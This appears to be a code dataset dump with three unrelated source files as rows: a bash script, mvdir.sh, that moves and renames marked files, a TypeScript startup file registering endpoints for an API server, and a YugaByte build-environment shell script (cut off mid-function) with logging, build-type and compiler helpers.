text stringlengths 1 1.05M |
|---|
#!/bin/bash
# mvdir.sh : Move directory to another for some specific files
# If works only for the files containing some string,
# and the string will be deleted after moving.
# Author : Kiyoon Kim (yoonkr33@gmail.com)
# Usage : mvdir.sh [input_dir] [output_dir] [containing_string]
# Warning : [containing_string] should be unique!!
# Example : mvdir.sh /home/music /home/music_converted __converted__
# then move /home/music/folder/sample__converted__.mp3 -> /home/music/folder/sample.mp3
if [ $# -lt 3 ]
then
echo "# mvdir.sh : Move directory to another for some specific files
# If works only for the files containing some string,
# and the string will be deleted after moving.
# Author : Kiyoon Kim (yoonkr33@gmail.com)
# Usage : mvdir.sh [input_dir] [output_dir] [containing_string]
# Warning : [containing_string] should be unique!!
# Example : mvdir.sh /home/music /home/music_converted __converted__
# then move /home/music/folder/sample__converted__.mp3 -> /home/music/folder/sample.mp3"
exit 1
fi
find "$1" -name "*$3*" | while read files
do
new_file=$(echo "$files" | sed -e "s/$1/$2/" | sed -e "s/$3//g")
dir=$(bash getdir.sh "$new_file")
mkdir -p "$dir"
mv -v "$files" "$new_file"
done
|
<reponame>belugafm/beluga-v3-api-server
import { AuthenticityTokenQueryRepository, LoginSessionQueryRepository, UserQueryRepository } from "./web/repositories"
import { Request, Response, TurboServer } from "./web/turbo"
import { Authenticator } from "./web/auth"
import { CookieAuthenticationApplication } from "./application/authentication/Cookie"
import { UserCommandRepository } from "./infrastructure/prisma/repository/command/User"
import config from "./config/app"
async function startServer() {
const server = new TurboServer(
{
maxParamLength: 128,
defaultRoute: (req: Request, res: Response) => {
res.setHeader("Content-Type", "application/json")
res.setStatusCode(404)
res.write(
Buffer.from(
JSON.stringify({
ok: false,
error: "endpoint_not_found",
})
)
)
res.end()
},
},
new UserCommandRepository(),
new Authenticator(
new CookieAuthenticationApplication(
new UserQueryRepository(),
new LoginSessionQueryRepository(),
new AuthenticityTokenQueryRepository()
)
)
)
// routerにendpointを登録
console.log("Register endpoints")
server.register(require("./web/endpoint/account/signup"))
server.register(require("./web/endpoint/account/signin"))
server.register(require("./web/endpoint/auth/cookie/authenticate"))
server.register(require("./web/endpoint/auth/twitter/request_token"))
server.register(require("./web/endpoint/auth/twitter/authenticate"))
server.register(require("./web/endpoint/channel_group/create"))
server.register(require("./web/endpoint/channel_group/show"))
server.register(require("./web/endpoint/channel_group/list_channels"))
server.register(require("./web/endpoint/channel_group/list_channel_groups"))
server.register(require("./web/endpoint/channel/create"))
server.register(require("./web/endpoint/channel/show"))
server.register(require("./web/endpoint/channel/list_channels"))
server.register(require("./web/endpoint/message/post"))
server.register(require("./web/endpoint/message/delete"))
server.register(require("./web/endpoint/timeline/channel"))
server.register(require("./web/endpoint/timeline/channel_group"))
server.register(require("./web/endpoint/upload/media"))
// server.register(require("./web/endpoint/debug"))
server.listen(config.server.port)
}
startServer()
.then(() => {
console.group("Server running")
})
.catch((error) => {
console.error(error)
})
|
#@IgnoreInspection BashAddShebang
# Copyright (c) YugaByte, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations
# under the License.
#
# This is common between build and test scripts.
set -euo pipefail
if [[ $BASH_SOURCE == $0 ]]; then
echo "$BASH_SOURCE must be sourced, not executed" >&2
exit 1
fi
# Guard against multiple inclusions.
if [[ -n ${YB_COMMON_BUILD_ENV_SOURCED:-} ]]; then
# Return to the executing script.
return
fi
YB_COMMON_BUILD_ENV_SOURCED=1
declare -i MAX_JAVA_BUILD_ATTEMPTS=5
# What matches these expressions will be filtered out of Maven output.
MVN_OUTPUT_FILTER_REGEX='\[INFO\] (Download(ing|ed): '
MVN_OUTPUT_FILTER_REGEX+='|[^ ]+ already added, skipping$)'
MVN_OUTPUT_FILTER_REGEX+='|^Generating .*[.]html[.][.][.]$'
MVN_OUTPUT_FILTER_REGEX+='|^\[INFO\] Copying .*[.]jar to .*[.]jar$'
readonly YB_JENKINS_NFS_HOME_DIR=/n/jenkins
# In our NFS environment, we keep Linuxbrew builds in this directory.
readonly SHARED_LINUXBREW_BUILDS_DIR="$YB_JENKINS_NFS_HOME_DIR/linuxbrew"
# We look for the list of distributed build worker nodes in this file. This gets populated by
# a cronjob on buildmaster running under the jenkins user (as of 06/20/2017).
readonly YB_BUILD_WORKERS_FILE=$YB_JENKINS_NFS_HOME_DIR/run/build-workers
# The assumed number of cores per build worker. This is used in the default make parallelism level
# calculation in yb_build.sh. This does not have to be the exact number of cores per worker, but
# will affect whether or not we force the auto-scaling group of workers to expand.
readonly YB_NUM_CORES_PER_BUILD_WORKER=8
# The "number of build workers" that we'll end up using to compute the parallelism (by multiplying
# it by YB_NUM_CORES_PER_BUILD_WORKER) will be first brought into this range.
readonly MIN_EFFECTIVE_NUM_BUILD_WORKERS=5
readonly MAX_EFFECTIVE_NUM_BUILD_WORKERS=10
readonly MVN_OUTPUT_FILTER_REGEX
# An even faster alternative to downloading a pre-built third-party dependency tarball from S3
# or Google Storage: just use a pre-existing third-party build from NFS. This has to be maintained
# outside of main (non-thirdparty) YB codebase's build pipeline.
readonly NFS_PARENT_DIR_FOR_SHARED_THIRDPARTY=/n/jenkins/thirdparty
# This node is the NFS server and is also used to run the non-distributed part of distributed builds
# (e.g. "cmake" or "make" commands) in a way such that it would have access to the build directory
# as a local filesystem.
#
# This must be something that could be compared with $HOSTNAME, i.e. this can't be
# "buildmaster.c.yugabyte.internal", only "buildmaster".
readonly DISTRIBUTED_BUILD_MASTER_HOST=buildmaster
# We create a Python Virtual Environment inside this directory in the build directory.
readonly YB_VIRTUALENV_BASENAME=python_virtual_env
# -------------------------------------------------------------------------------------------------
# Functions used in initializing some constants
# -------------------------------------------------------------------------------------------------
print_stack_trace() {
local -i i=${1:-1} # Allow the caller to set the line number to start from.
echo "Stack trace:" >&2
while [[ $i -lt "${#FUNCNAME[@]}" ]]; do
echo " ${BASH_SOURCE[$i]}:${BASH_LINENO[$((i - 1))]} ${FUNCNAME[$i]}" >&2
let i+=1
done
}
fatal() {
if [[ -n "${yb_fatal_quiet:-}" ]]; then
yb_log_quiet=$yb_fatal_quiet
else
yb_log_quiet=false
fi
yb_log_skip_top_frames=1
log "$@"
if ! "$yb_log_quiet"; then
print_stack_trace 2 # Exclude this line itself from the stack trace (start from 2nd line).
fi
exit 1
}
get_timestamp() {
date +%Y-%m-%dT%H:%M:%S
}
get_timestamp_for_filenames() {
date +%Y-%m-%dT%H_%M_%S
}
log_empty_line() {
echo >&2
}
log_separator() {
log_empty_line
echo >&2 "--------------------------------------------------------------------------------------"
log_empty_line
}
heading() {
log_empty_line
echo >&2 "--------------------------------------------------------------------------------------"
echo >&2 "$1"
echo >&2 "--------------------------------------------------------------------------------------"
log_empty_line
}
log() {
if [[ "${yb_log_quiet:-}" != "true" ]]; then
# Weirdly, when we put $* inside double quotes, that has an effect of making the following log
# statement produce multi-line output:
#
# log "Some long log statement" \
# "continued on the other line."
#
# We want that to produce a single line the same way the echo command would. Putting $* by
# itself achieves that effect. That has a side effect of passing echo-specific arguments
# (e.g. -n or -e) directly to the final echo command.
#
# On why the index for BASH_LINENO is one lower than that for BASH_SOURECE and FUNCNAME:
# This is different from the manual says at
# https://www.gnu.org/software/bash/manual/html_node/Bash-Variables.html:
#
# An array variable whose members are the line numbers in source files where each
# corresponding member of FUNCNAME was invoked. ${BASH_LINENO[$i]} is the line number in the
# source file (${BASH_SOURCE[$i+1]}) where ${FUNCNAME[$i]} was called (or ${BASH_LINENO[$i-1]}
# if referenced within another shell function). Use LINENO to obtain the current line number.
#
# Our experience is that FUNCNAME indexes exactly match those of BASH_SOURCE.
local stack_idx0=${yb_log_skip_top_frames:-0}
local stack_idx1=$(( $stack_idx0 + 1 ))
echo "[$( get_timestamp )" \
"${BASH_SOURCE[$stack_idx1]##*/}:${BASH_LINENO[$stack_idx0]}" \
"${FUNCNAME[$stack_idx1]}]" $* >&2
fi
}
log_with_color() {
local log_color=$1
shift
log "$log_color$*$NO_COLOR"
}
horizontal_line() {
echo "------------------------------------------------------------------------------------------"
}
thick_horizontal_line() {
echo "=========================================================================================="
}
header() {
echo
horizontal_line
echo "$@"
horizontal_line
echo
}
# Usage: expect_some_args "$@"
# Fatals if there are no arguments.
expect_some_args() {
local calling_func_name=${FUNCNAME[1]}
if [[ $# -eq 0 ]]; then
fatal "$calling_func_name expects at least one argument"
fi
}
# Make a regular expression from a list of possible values. This function takes any non-zero number
# of arguments, but each argument is further broken down into components separated by whitespace,
# and those components are treated as separate possible values. Empty values are ignored.
make_regex_from_list() {
local list_var_name=$1
expect_some_args "$@"
local regex=""
local list_var_name_full="$list_var_name[@]"
for item in "${!list_var_name_full}"; do
if [[ -z $item ]]; then
continue
fi
if [[ -n $regex ]]; then
regex+="|"
fi
regex+="$item"
done
eval "${list_var_name}_RE=\"^($regex)$\""
eval "${list_var_name}_RAW_RE=\"$regex\""
}
make_regexes_from_lists() {
local list_var_name
for list_var_name in "$@"; do
make_regex_from_list "$list_var_name"
done
}
# -------------------------------------------------------------------------------------------------
# Constants
# -------------------------------------------------------------------------------------------------
readonly VALID_BUILD_TYPES=(
asan
debug
fastdebug
idebug
irelease
ifastdebug
profile_build
profile_gen
release
tsan
tsan_slow
)
# Valid values of CMAKE_BUILD_TYPE passed to the top-level CMake build. This is the same as the
# above with the exclusion of ASAN/TSAN.
readonly VALID_CMAKE_BUILD_TYPES=(
debug
fastdebug
profile_build
profile_gen
release
)
readonly VALID_COMPILER_TYPES=( gcc clang zapcc )
readonly VALID_LINKING_TYPES=( static dynamic )
readonly VALID_EDITIONS=( community enterprise )
make_regexes_from_lists \
VALID_BUILD_TYPES \
VALID_CMAKE_BUILD_TYPES \
VALID_COMPILER_TYPES \
VALID_LINKING_TYPES \
VALID_EDITIONS
readonly BUILD_ROOT_BASENAME_RE=\
"^($VALID_BUILD_TYPES_RAW_RE)-\
($VALID_COMPILER_TYPES_RAW_RE)-\
($VALID_LINKING_TYPES_RAW_RE)-\
($VALID_EDITIONS_RAW_RE)\
(-ninja)?$"
readonly YELLOW_COLOR="\033[0;33m"
readonly RED_COLOR="\033[0;31m"
readonly CYAN_COLOR="\033[0;36m"
readonly NO_COLOR="\033[0m"
# We first use this to find ephemeral drives.
readonly EPHEMERAL_DRIVES_GLOB="/mnt/ephemeral* /mnt/d*"
# We then filter the drives found using this.
# The way we use this regex we expect it NOT to be anchored in the end.
readonly EPHEMERAL_DRIVES_FILTER_REGEX="^/mnt/(ephemeral|d)[0-9]+" # No "$" in the end.
# http://stackoverflow.com/questions/5349718/how-can-i-repeat-a-character-in-bash
readonly HORIZONTAL_LINE=$( printf '=%.0s' {1..80} )
# -------------------------------------------------------------------------------------------------
# Functions
# -------------------------------------------------------------------------------------------------
yellow_color() {
echo -ne "$YELLOW_COLOR"
}
red_color() {
echo -ne "$RED_COLOR"
}
no_color() {
echo -ne "$NO_COLOR"
}
to_lowercase() {
tr A-Z a-z
}
is_mac() {
[[ "$OSTYPE" =~ ^darwin ]]
}
is_linux() {
[[ "$OSTYPE" =~ ^linux ]]
}
expect_vars_to_be_set() {
local calling_func_name=${FUNCNAME[1]}
local var_name
for var_name in "$@"; do
if [[ -z ${!var_name:-} ]]; then
fatal "The '$var_name' variable must be set by the caller of $calling_func_name." \
"$calling_func_name expects the following variables to be set: $@."
fi
done
}
# Validates the number of arguments passed to its caller. Should also be passed all the caller's
# arguments using "$@".
# Example:
# expect_num_args 1 "$@"
expect_num_args() {
expect_some_args "$@"
local caller_expected_num_args=$1
local calling_func_name=${FUNCNAME[1]}
shift
if [[ $# -ne $caller_expected_num_args ]]; then
yb_log_quiet=false
local error_msg="$calling_func_name expects $caller_expected_num_args arguments, got $#."
if [[ $# -eq 0 ]]; then
error_msg+=" Check if \"\$@\" was included in the call to expect_num_args."
fi
if [[ $# -gt 0 ]]; then
log "Logging actual arguments to '$calling_func_name' before a fatal error:"
local arg
for arg in "$@"; do
log " - $arg"
done
fi
fatal "$error_msg"
fi
}
normalize_build_type() {
validate_build_type "$build_type"
local lowercase_build_type=$( echo "$build_type" | to_lowercase )
if [[ "$build_type" != "$lowercase_build_type" ]]; then
# Only assign if we actually need to, because the build_type variable may already be read-only.
build_type=$lowercase_build_type
fi
}
# Sets the build directory based on the given build type (the build_type variable) and the value of
# the YB_COMPILER_TYPE environment variable.
set_build_root() {
if [[ ${1:-} == "--no-readonly" ]]; then
local -r make_build_root_readonly=false
shift
else
local -r make_build_root_readonly=true
fi
expect_num_args 0 "$@"
normalize_build_type
readonly build_type
validate_compiler_type "$YB_COMPILER_TYPE"
determine_linking_type
BUILD_ROOT=$YB_BUILD_PARENT_DIR/$build_type-$YB_COMPILER_TYPE-$YB_LINK
detect_edition
BUILD_ROOT+="-$YB_EDITION"
if using_ninja; then
BUILD_ROOT+="-ninja"
fi
normalize_build_root
if "$make_build_root_readonly"; then
readonly BUILD_ROOT
fi
if [[ -n ${predefined_build_root:-} && $predefined_build_root != $BUILD_ROOT ]]; then
fatal "An inconsistency between predefined BUILD_ROOT ('$predefined_build_root') and" \
"computed BUILD_ROOT ('$BUILD_ROOT')."
fi
export BUILD_ROOT
export YB_BUILD_ROOT=$BUILD_ROOT
}
# Resolve the BUILD_ROOT symlink and save the result to the real_build_root_path variable.
set_real_build_root_path() {
if [[ -h $BUILD_ROOT ]]; then
real_build_root_path=$( readlink "$BUILD_ROOT" )
else
real_build_root_path="$BUILD_ROOT"
fi
readonly real_build_root_path=$( cd "$real_build_root_path" && pwd )
}
ensure_build_root_is_set() {
if [[ -z ${BUILD_ROOT:-} ]]; then
fatal "The BUILD_ROOT environment variable is not set. This must point to the absolute path" \
"of the build root directory, e.g. '<yugabyte_src_dir>/build/debug'."
fi
}
ensure_directory_exists() {
expect_num_args 1 "$@"
local directory_path=$1
if [[ ! -d $directory_path ]]; then
fatal "Directory '$directory_path' does not exist or is not a directory"
fi
}
ensure_file_exists() {
expect_num_args 1 "$@"
local file_name=$1
if [[ ! -f $file_name ]]; then
fatal "File '$file_name' does not exist or is not a file"
fi
}
ensure_build_root_exists() {
ensure_build_root_is_set
if [[ ! -d $BUILD_ROOT ]]; then
fatal "The directory BUILD_ROOT ('$BUILD_ROOT') does not exist"
fi
}
normalize_build_root() {
ensure_build_root_is_set
if [[ -d $BUILD_ROOT ]]; then
BUILD_ROOT=$( cd "$BUILD_ROOT" && pwd )
fi
}
determine_linking_type() {
if [[ -z "${YB_LINK:-}" ]]; then
YB_LINK=dynamic
fi
if [[ ! "${YB_LINK:-}" =~ ^$VALID_LINKING_TYPES_RE$ ]]; then
fatal "Expected YB_LINK to be set to \"static\" or \"dynamic\", got \"${YB_LINK:-}\""
fi
export YB_LINK
readonly YB_LINK
}
validate_build_type() {
expect_num_args 1 "$@"
# Local variable named _build_type to avoid a collision with the global build_type variable.
local _build_type=$1
if ! is_valid_build_type "$_build_type"; then
fatal "Invalid build type: '$_build_type'. Valid build types are: ${VALID_BUILD_TYPES[@]}" \
"(case-insensitive)."
fi
}
is_valid_build_type() {
expect_num_args 1 "$@"
local -r _build_type=$( echo "$1" | to_lowercase )
[[ "$_build_type" =~ $VALID_BUILD_TYPES_RE ]]
}
set_build_type_based_on_jenkins_job_name() {
if [[ -n "${build_type:-}" ]]; then
if [[ -n "${JOB_NAME:-}" ]]; then
# This message only makes sense if JOB_NAME is set.
log "Build type is already set to '$build_type', not setting it based on Jenkins job name."
fi
normalize_build_type
readonly build_type
return
fi
build_type=debug
if [[ -z "${JOB_NAME:-}" ]]; then
log "Using build type '$build_type' by default because JOB_NAME is not set."
readonly build_type
return
fi
local _build_type # to avoid collision with the global build_type variable
local jenkins_job_name=$( echo "$JOB_NAME" | to_lowercase )
for _build_type in "${VALID_BUILD_TYPES[@]}"; do
if [[ "-$jenkins_job_name-" =~ [-_]$_build_type[-_] ]]; then
log "Using build type '$_build_type' based on Jenkins job name '$JOB_NAME'."
readonly build_type=$_build_type
return
fi
done
readonly build_type
log "Using build type '$build_type' by default: could not determine from Jenkins job name" \
"'$JOB_NAME'."
}
set_default_compiler_type() {
if [[ -z "${YB_COMPILER_TYPE:-}" ]]; then
if [[ "$OSTYPE" =~ ^darwin ]]; then
YB_COMPILER_TYPE=clang
else
YB_COMPILER_TYPE=gcc
fi
export YB_COMPILER_TYPE
readonly YB_COMPILER_TYPE
fi
}
is_clang() {
if [[ $YB_COMPILER_TYPE == "clang" ]]; then
return 0
else
return 1
fi
}
is_gcc() {
if [[ $YB_COMPILER_TYPE == "gcc" ]]; then
return 0
else
return 1
fi
}
build_compiler_if_necessary() {
# Sometimes we have to build the compiler before we can run CMake.
if is_clang && is_linux; then
log "Building clang before we can run CMake with compiler pointing to clang"
"$YB_THIRDPARTY_DIR/build_thirdparty.py" llvm
fi
}
set_compiler_type_based_on_jenkins_job_name() {
if [[ -n "${YB_COMPILER_TYPE:-}" ]]; then
if [[ -n "${JOB_NAME:-}" ]]; then
log "The YB_COMPILER_TYPE variable is already set to '${YB_COMPILER_TYPE}', not setting it" \
"based on the Jenkins job name."
fi
else
local compiler_type
local jenkins_job_name=$( echo "$JOB_NAME" | to_lowercase )
YB_COMPILER_TYPE=""
for compiler_type in "${VALID_COMPILER_TYPES[@]}"; do
if [[ "-$jenkins_job_name-" =~ [-_]$compiler_type[-_] ]]; then
log "Setting YB_COMPILER_TYPE='$compiler_type' based on Jenkins job name '$JOB_NAME'."
YB_COMPILER_TYPE=$compiler_type
break
fi
done
if [[ -z "$YB_COMPILER_TYPE" ]]; then
log "Could not determine compiler type from Jenkins job name '$JOB_NAME'," \
"will use the default."
return
fi
fi
validate_compiler_type
readonly YB_COMPILER_TYPE
export YB_COMPILER_TYPE
}
validate_compiler_type() {
local compiler_type
if [[ $# -eq 0 ]]; then
if [[ -z ${YB_COMPILER_TYPE:-} ]]; then
fatal "$FUNCNAME is called with no arguments but YB_COMPILER_TYPE is not set or is empty"
fi
compiler_type=$YB_COMPILER_TYPE
elif [[ $# -eq 1 ]]; then
compiler_type=$1
else
fatal "$FUNCNAME can only be called with 0 or 1 argument, got $# arguments: $*"
fi
if [[ ! $compiler_type =~ $VALID_COMPILER_TYPES_RE ]]; then
fatal "Invalid compiler type: YB_COMPILER_TYPE='$compiler_type'" \
"(expected one of: ${VALID_COMPILER_TYPES[@]})."
fi
}
validate_cmake_build_type() {
expect_num_args 1 "$@"
local _cmake_build_type=$1
_cmake_build_type=$( echo "$_cmake_build_type" | tr A-Z a-z )
if [[ ! "$_cmake_build_type" =~ $VALID_CMAKE_BUILD_TYPES_RE ]]; then
fatal "Invalid CMake build type (what we're about to pass to our CMake build as" \
"_cmake_build_type): '$_cmake_build_type'." \
"Valid CMake build types are: ${VALID_CMAKE_BUILD_TYPES[@]}."
fi
}
ensure_using_clang() {
if [[ -n ${YB_COMPILER_TYPE:-} && $YB_COMPILER_TYPE != "clang" ]]; then
fatal "ASAN/TSAN builds require clang," \
"but YB_COMPILER_TYPE is already set to '$YB_COMPILER_TYPE'"
fi
YB_COMPILER_TYPE="clang"
}
enable_tsan() {
cmake_opts+=( -DYB_USE_TSAN=1 )
ensure_using_clang
}
# This performs two configuration actions:
# - Sets cmake_build_type based on build_type. cmake_build_type is what's being passed to CMake
# using the CMAKE_BUILD_TYPE variable. CMAKE_BUILD_TYPE can't be "asan" or "tsan".
# - Ensure the YB_COMPILER_TYPE environment variable is set. It is used by our compiler-wrapper.sh
# script to invoke the appropriate C/C++ compiler.
set_cmake_build_type_and_compiler_type() {
if [[ -z "${cmake_opts:-}" ]]; then
cmake_opts=()
fi
if [[ -z ${build_type:-} ]]; then
log "Setting build type to 'debug' by default"
build_type=debug
fi
normalize_build_type
# We're relying on build_type to set more variables, so make sure it does not change later.
readonly build_type
case "$build_type" in
asan)
cmake_opts+=( -DYB_USE_ASAN=1 -DYB_USE_UBSAN=1 )
cmake_build_type=fastdebug
ensure_using_clang
;;
tsan)
enable_tsan
cmake_build_type=fastdebug
;;
tsan_slow)
enable_tsan
cmake_build_type=debug
;;
idebug|irelease|ifastdebug)
cmake_build_type=${build_type:1}
cmake_opts+=( -DYB_INSTRUMENT_FUNCTIONS=1 )
;;
*)
cmake_build_type=$build_type
esac
validate_cmake_build_type "$cmake_build_type"
readonly cmake_build_type
if is_mac; then
if [[ -z ${YB_COMPILER_TYPE:-} ]]; then
YB_COMPILER_TYPE=clang
elif [[ $YB_COMPILER_TYPE != "clang" ]]; then
fatal "YB_COMPILER_TYPE can only be 'clang' on Mac OS X," \
"found YB_COMPILER_TYPE=$YB_COMPILER_TYPE."
fi
elif [[ -z ${YB_COMPILER_TYPE:-} ]]; then
# The default on Linux.
YB_COMPILER_TYPE=gcc
fi
validate_compiler_type
readonly YB_COMPILER_TYPE
export YB_COMPILER_TYPE
# We need to set CMAKE_C_COMPILER and CMAKE_CXX_COMPILER outside of CMake. We used to do that from
# CMakeLists.txt, and got into an infinite loop where CMake kept saying:
#
# You have changed variables that require your cache to be deleted.
# Configure will be re-run and you may have to reset some variables.
# The following variables have changed:
# CMAKE_CXX_COMPILER= /usr/bin/c++
#
# Not sure why it printed the old value there, since we tried to assign it the new value, the
# same as what's given below.
#
# So our new approach is to pass the correct command-line options to CMake, and still let CMake
# use the default compiler in CLion-triggered builds.
cmake_opts+=( "-DCMAKE_BUILD_TYPE=$cmake_build_type" )
cmake_opts+=( "${YB_DEFAULT_CMAKE_OPTS[@]}" )
if using_ninja; then
cmake_opts+=( -G Ninja )
make_program=ninja
if ! which ninja &>/dev/null; then
if using_linuxbrew; then
make_program=$YB_LINUXBREW_DIR/bin/ninja
elif is_mac; then
log "Did not find the 'ninja' executable, auto-installing ninja using Homebrew"
brew install ninja
fi
fi
make_file=build.ninja
else
make_program=make
make_file=Makefile
fi
cmake_opts+=( -DCMAKE_MAKE_PROGRAM=$make_program )
}
set_mvn_parameters() {
if [[ -z ${YB_MVN_LOCAL_REPO:-} ]]; then
if is_jenkins && is_src_root_on_nfs; then
YB_MVN_LOCAL_REPO=/n/jenkins/m2_repository
else
YB_MVN_LOCAL_REPO=$HOME/.m2/repository
fi
fi
export YB_MVN_LOCAL_REPO
if [[ -z ${YB_MVN_SETTINGS_PATH:-} ]]; then
if is_jenkins && is_src_root_on_nfs; then
YB_MVN_SETTINGS_PATH=/n/jenkins/m2_settings.xml
else
YB_MVN_SETTINGS_PATH=$HOME/.m2/settings.xml
fi
fi
export MVN_SETTINGS_PATH
mvn_common_options=(
--batch-mode
-Dmaven.repo.local="$YB_MVN_LOCAL_REPO"
-Dyb.thirdparty.dir="$YB_THIRDPARTY_DIR"
-DbinDir="$BUILD_ROOT/bin"
)
}
# A utility function called by both 'build_yb_java_code' and 'build_yb_java_code_with_retries'.
build_yb_java_code_filter_save_output() {
set_mvn_parameters
# --batch-mode hides download progress.
# We are filtering out some patterns from Maven output, e.g.:
# [INFO] META-INF/NOTICE already added, skipping
# [INFO] Downloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.4/plexus-classworlds-2.4.jar (46 KB at 148.2 KB/sec)
# [INFO] Downloading: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.1.2/doxia-logging-api-1.1.2.jar
local has_local_output=false # default is output path variable is set by calling function
if [[ -z ${java_build_output_path:-} ]]; then
local java_build_output_path=/tmp/yb-java-build-$( get_timestamp ).$$.tmp
has_local_output=true
fi
local mvn_opts=( "${mvn_common_options[@]}" )
if [[ -f $YB_MVN_SETTINGS_PATH ]]; then
mvn_opts+=(
--settings "$YB_MVN_SETTINGS_PATH"
)
elif [[ $YB_MVN_SETTINGS_PATH != $HOME/.m2/settings.xml ]]; then
log "Maven user settings file specified by YB_MVN_SETTINGS_PATH does not exist:" \
"'$YB_MVN_SETTINGS_PATH'"
fi
if ! is_jenkins; then
mvn_opts+=( -Dmaven.javadoc.skip )
fi
set +e -x # +e: do not fail on grep failure, -x: print the command to stderr.
if mvn "${mvn_opts[@]}" "$@" 2>&1 | \
egrep -v --line-buffered "$MVN_OUTPUT_FILTER_REGEX" | \
tee "$java_build_output_path"; then
set +x # stop printing commands
# We are testing for mvn build failure with grep, since we run mvn with '--fail-never' which
# always returns success. '--fail-at-end' could have been another possibility, but that mode
# skips dependent modules so most tests are often not run. Therefore, we resort to grep.
egrep "BUILD SUCCESS" "$java_build_output_path" &>/dev/null
local mvn_exit_code=$?
set -e
if [[ $has_local_output == "true" ]]; then
rm -f "$java_build_output_path" # cleaning up
fi
log "Java build finished with exit code $mvn_exit_code" # useful for searching in console output
return $mvn_exit_code
fi
set -e +x
log "Java build or one of its output filters failed"
if [[ -f $java_build_output_path ]]; then
log "Java build output (from '$java_build_output_path'):"
cat "$java_build_output_path"
log "(End of Java build output)"
rm -f "$java_build_output_path"
else
log "Java build output path file not found at '$java_build_output_path'"
fi
return 1
}
build_yb_java_code() {
local java_build_output_path=/tmp/yb-java-build-$( get_timestamp ).$$.tmp
build_yb_java_code_filter_save_output "$@"
local mvn_exit_code=$?
rm -f "$java_build_output_path"
return $mvn_exit_code
}
build_yb_java_code_with_retries() {
local java_build_output_path=/tmp/yb-java-build-$( get_timestamp ).$$.tmp
declare -i attempt=1
while [[ $attempt -le $MAX_JAVA_BUILD_ATTEMPTS ]]; do
if build_yb_java_code_filter_save_output "$@"; then
rm -f "$java_build_output_path"
return 0
fi
if grep "Could not transfer artifact" "$java_build_output_path" >/dev/null; then
log "Java build attempt $attempt failed due to temporary connectivity issues, re-trying."
else
return 1
fi
rm -f "$java_build_output_path"
let attempt+=1
done
return 1
}
# Create a directory on an ephemeral drive and link it into the given target location. If there are
# no ephemeral drives, create the directory in place.
# Parameters:
# target_path - The target path to create the directory or symlink at.
# directory_identifier - A unique identifier that will be used in naming the new directory
# created on an ephemeral drive.
create_dir_on_ephemeral_drive() {
expect_num_args 2 "$@"
local target_path=$1
local directory_identifier=$2
if [[ -z ${num_ephemeral_drives:-} ]]; then
# Collect available ephemeral drives. This is only done once.
local ephemeral_mountpoint
# EPHEMERAL_DRIVES_FILTER_REGEX is not supposed to be anchored in the end, so we need to add
# a "$" to filter ephemeral mountpoints correctly.
ephemeral_drives=()
for ephemeral_mountpoint in $EPHEMERAL_DRIVES_GLOB; do
if [[ -d $ephemeral_mountpoint &&
$ephemeral_mountpoint =~ $EPHEMERAL_DRIVES_FILTER_REGEX$ ]]; then
ephemeral_drives+=( "$ephemeral_mountpoint" )
fi
done
declare -r -i num_ephemeral_drives=${#ephemeral_drives[@]} # "-r -i" means readonly integer.
fi
if [[ $num_ephemeral_drives -eq 0 ]]; then
if [[ -n ${YB_VERBOSE:-} && ! -d $target_path ]]; then
log "No ephemeral drives found, creating directory '$target_path' in place."
fi
mkdir_safe "$target_path"
else
local random_drive=${ephemeral_drives[$RANDOM % $num_ephemeral_drives]}
local actual_dir=$random_drive/${USER}__$jenkins_job_and_build/$directory_identifier
mkdir_safe "$actual_dir"
# Create the parent directory that we'll be creating a link in, if necessary.
if [[ ! -d ${target_path%/*} ]]; then
log "Directory $target_path does not exist, creating it before creating a symlink inside."
mkdir_safe "${target_path%/*}"
fi
ln -s "$actual_dir" "$target_path"
log "Created '$target_path' as a symlink to an ephemeral drive location '$actual_dir'."
fi
}
mkdir_safe() {
expect_num_args 1 "$@"
local dir_path=$1
# Check if this is a broken link.
if [[ -h $dir_path && ! -d $dir_path ]]; then
unlink "$dir_path"
fi
mkdir -p "$dir_path"
}
# Skip the most part of the normal C++ build output. Still keep the "100%" lines so we can see
# if the build runs to completion. This only filters stdin, so it is expected that stderr is
# redirected to stdout when invoking the C++ build.
filter_boring_cpp_build_output() {
egrep -v --line-buffered "\
^(\[ *[0-9]{1,2}%\] +)*(\
Building C(XX)? object |\
Running C[+][+] protocol buffer compiler (with YRPC plugin )?on |\
Linking CXX ((static|shared )?library|executable) |\
Built target \
)|\
Scanning dependencies of target |\
^ssh: connect to host .* port [0-9]+: Connection (timed out|refused)|\
Host .* seems to be down, retrying on a different host|\
Connection to .* closed by remote host.|\
ssh: Could not resolve hostname build-workers-.*: Name or service not known"
}
remove_path_entry() {
expect_num_args 1 "$@"
local path_entry=$1
local prev_path=""
# Remove all occurrences of the given entry.
while [[ $PATH != $prev_path ]]; do
prev_path=$PATH
PATH=:$PATH:
PATH=${PATH//:$path_entry:/:}
PATH=${PATH#:}
PATH=${PATH%:}
done
export PATH
}
# Removes the ccache wrapper directory from PATH so we can find the real path to a compiler, e.g.
# /usr/bin/gcc instead of /usr/lib64/ccache/gcc. This is expected to run in a subshell so that we
# don't make any unexpected changes to the script's PATH.
# TODO: how to do this properly on Mac OS X?
remove_ccache_dir_from_path() {
remove_path_entry /usr/lib64/ccache
}
# Given a compiler type, e.g. gcc or clang, find the actual compiler executable (not a wrapper
# provided by ccache). Takes into account YB_GCC_PREFIX and YB_CLANG_PREFIX variables that allow to
# use custom gcc and clang installations. Sets cc_executable and cxx_executable variables. This is
# used in compiler-wrapper.sh.
find_compiler_by_type() {
compiler_type=$1
validate_compiler_type "$1"
local compiler_type=$1
unset cc_executable
unset cxx_executable
case "$compiler_type" in
gcc)
if [[ -n ${YB_GCC_PREFIX:-} ]]; then
if [[ ! -d $YB_GCC_PREFIX/bin ]]; then
fatal "Directory YB_GCC_PREFIX/bin ($YB_GCC_PREFIX/bin) does not exist"
fi
cc_executable=$YB_GCC_PREFIX/bin/gcc
cxx_executable=$YB_GCC_PREFIX/bin/g++
elif using_linuxbrew; then
cc_executable=$YB_LINUXBREW_DIR/bin/gcc
